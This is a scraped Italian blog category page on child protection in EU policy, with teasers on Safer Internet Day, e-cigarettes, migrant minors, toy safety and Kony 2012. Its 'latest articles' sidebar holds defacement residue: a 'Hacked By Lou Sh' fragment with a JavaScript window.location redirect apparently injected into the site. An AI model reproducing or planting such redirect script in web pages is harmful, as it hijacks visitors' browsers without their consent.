EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Tutela dei Minori

Tutela dei Minori


Tutela dei Minori

it

Martedì 11 febbraio, in oltre 100 Paesi (e per la prima volta anche negli Stati Uniti), è stato celebrato il Safer Internet Day, un’iniziativa della Commissione europea, giunta ormai all’undicesima edizione, che ha avuto come fine quello di promuovere, soprattutto tra i più giovani, un utilizzo sicuro e responsabile dei media.

Erano gli anni Sessanta quando il Dipartimento di Difesa statunitense decise di collegare tra di loro alcune università che si occupavano di progetti militari, sfruttando linee di telecomunicazione ad alta velocità. L’obiettivo era semplice: mettere a punto un sistema di difesa e di (...)

it

Nel corso della sessione plenaria dell’8 ottobre 2013, gli eurodeputati hanno approvato una proposta che si pone in contrasto con il disegno di legge avanzato dalla Commissione europea di far rientrare nella categoria dei medicinali anche le sigarette elettroniche. Le cifre parlano chiaro: circa 700 mila cittadini europei ogni anno muoiono per problemi che spesso sono legati al fumo. Le normative degli ultimi dieci anni, hanno inasprito ancora di più le leggi in materia, ma comunque rimane una sostanziosa fetta della popolazione giovanile europea, il 29 %, che continua a praticare questa insana attività.

La lobby del tabacco ha mosso severi rimproveri riguardo le proposte della Commissione europea e ha esercitato una forte pressione nei confronti dei deputati europei poco prima del voto. Così durante la votazione, i deputati europei sono stati disposti ad accettare norme più restrittive per ciò (...)

it

Di recente la Commissione Europea ha diretto uno studio che prende in considerazione la situazione dei minori figli di migranti che subiscono il rischio di essere segregati a livello scolastico e trovarsi in scuole che offrono loro poche risorse. Questo porta a far sì che i ragazzi abbandonino prima del tempo la scuola o che abbiano un rendimento scolastico insufficiente. Su quest’ultimo punto si focalizza il lavoro svolto dalla Commissione Europea che intende fornire un aiuto educativo anche a livello di integrazione per permettere anche ai ragazzi stranieri di integrarsi in società.

Il lavoro ha analizzato ben 15 paesi per esaminare il loro flusso migratorio e capire se i vari Stati membri dell’Unione contribuiscano o meno nel fornire un sostegno valido ai minori. Gli Stati oggetto di studio sono Austria, Belgio (comunità fiamminga), Cipro, Danimarca, Francia, Germania, (...)

it

Il Parlamento europeo ha approvato con larga maggioranza il rapporto presentato dall’eurodeputata Silvia Costa, il quale mira a tutelare la presenza dei minori nel mondo di Internet. Punto centrale della sua relazione è quello di collocare i diritti dei bambini come tema trasversale nelle politiche Ue. Oltre a garantire maggiore protezione, la stessa relazione si pone come obiettivo quello di presentare le innumerevoli opportunità che il digitale mette a disposizione dei minori.

Minori e Internet

La tutela dei minori su Internet è da sempre una questione al centro dell’attenzione e alla quale va attribuita la massima importanza. Stando ad una relazione presentata lo scorso aprile alla commissione Cultura del Parlamento di Strasburgo dall’eurodeputata Silvia Costa, i (...)

it

Maggiore impegno a livello nazionale ed europeo. Questa è la richiesta della Commissione, contenuta nella relazione presentata alla fine di settembre. Il miglioramento delle procedure di accoglienza di questi soggetti è auspicato anche dalla commissaria per gli Affari interni Cecilia Malmström.

Chi sono i minori non accompagnati

Con questo termine vengono identificati i minori provenienti da paesi terzi o gli apolidi, che non raggiungono il diciottesimo anno d’età e che si inoltrano nel territorio europeo senza una persona adulta responsabile che li accompagni, o che qui vengono (...)

it

E' proprio notizia di questi giorni (8 agosto) l'intervento dei i carabinieri del Nas di Torino che hanno ritirato circa duemila pistole spara-bolle. Il tutto dopo la denuncia di una madre che aveva visto i propri figli cadere vittima di sintomi influenzali immediatamente dopo aver utilizzato gli oggetti in questione. Al loro interno è stato trovato un sapone inquinato da diversi ceppi batterici, i quali avrebbero causato la condizione febbricitante dei due fratellini. Purtroppo questo è solo uno dei tanti esempi che possiamo citare. Come se l'Unione europea avesse previsto tutto, ecco ad inizio agosto spuntare questo divertente video che tende a sensibilizzare i grandi ed i bambini riguardo il problema "sicurezza giocattoli".

Le norme che i costruttori di giocattoli dovranno rispettare si fanno sempre più rigide. La colpa è di coloro che continuano a produrre balocchi in quantità industriale ma anche pericolosa. Non c’è tempo per svolgere un lavoro adeguato, per rispettare le norme, l’importante è soltanto il profitto. (...)

it

Tre bambini su quattro navigano sul web e un terzo di essi lo fa attraverso dispositivi mobili. E’ questo il dato preoccupante che ha messo in allarme i vertici di Bruxelles e ha portato alla definizione di nuove strategie il cui obiettivo è quello di creare un web sicuro e adatto ai minori e di fornire ai genitori strumenti di controllo maggiori in grado di combatterei rischi della rete.

Il tema dei minori e della loro tutela sul Web è da sempre al centro dell’attenzione della Commissione Europea. A tal proposito, nella giornata del 2 maggio scorso, l’Esecutivo comunitario, nella figura del suo Commissario per l’Agenda Digitale, Neelie Kroes, ha presentato un nuovo piano rivolto (...)

it

La Commissione Europea ha lanciato mercoledì 2 maggio una nuova strategia per la tutela dei diritti dei minori nel cyberspazio. Il piano prevede anche la lotta contro gli abusi sessuali online attraverso “soluzioni tecniche innovative” da parte delle forze di polizia continentali

Internet, lo spazio di infinita libertà, può essere un brutto luogo d’incontro per gli utenti, soprattutto per i più piccoli, ancora non in grado di scindere ciò che è bene e ciò che è male. Lo strumento diffusosi così rapidamente e così radicalmente democratizzato ha presentato anche una nutrita lista (...)

it

È scontro aperto tra il garante della privacy dell’Unione europea e i social network, primo fra tutti Facebook. Ad essere oggetto del contendere è il meccanismo del tagging, cioè la possibilità di apporre delle etichette (tag) alle immagini per permettere di identificare gli amici. Secondo l’Ue infatti l'uso dei tag, seppure consentito, deve necessariamente essere autorizzato dagli utenti al fine di tutelare la loro privacy.

Cosa sono e a che servono i tag?A chiunque usi Facebook o un altro social network sarà capitato, almeno una volta, di taggare o essere taggato in una foto. Per chi non lo sapesse però è meglio precisare, visti i tempi, che l’operazione di inserimento dei tag (in inglese “tagging”) non è una pratica (...)

it

Jason Russell, Bobby Bailey e Laren Poole e i fondatori di Invisible Children Inc. hanno realizzato un video che si autodistruggerà il 31 dicembre 2012. Diffuso a partire dallo scorso 5 marzo, il filmano si propone di sconfiggere e catturare Joseph Kony, un guerriero ugandese che da anni si macchia dei peggiori reati che si possano immaginare: rapimento di minori, induzione alla prostituzione o alla carriera militare, stupro, induzione alla criminalità.

Fino a qualche giorno fa Kony era un semplice nome che diceva ben poco ad ognuno di noi. Nessuno, o forse pochi, erano a conoscenza della dura realtà nascosta dietro quattro semplici lettere. Nessuno avrebbe mai immaginato che un solo uomo fosse capace di generare tanto terrore.

Chi è Kony? (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France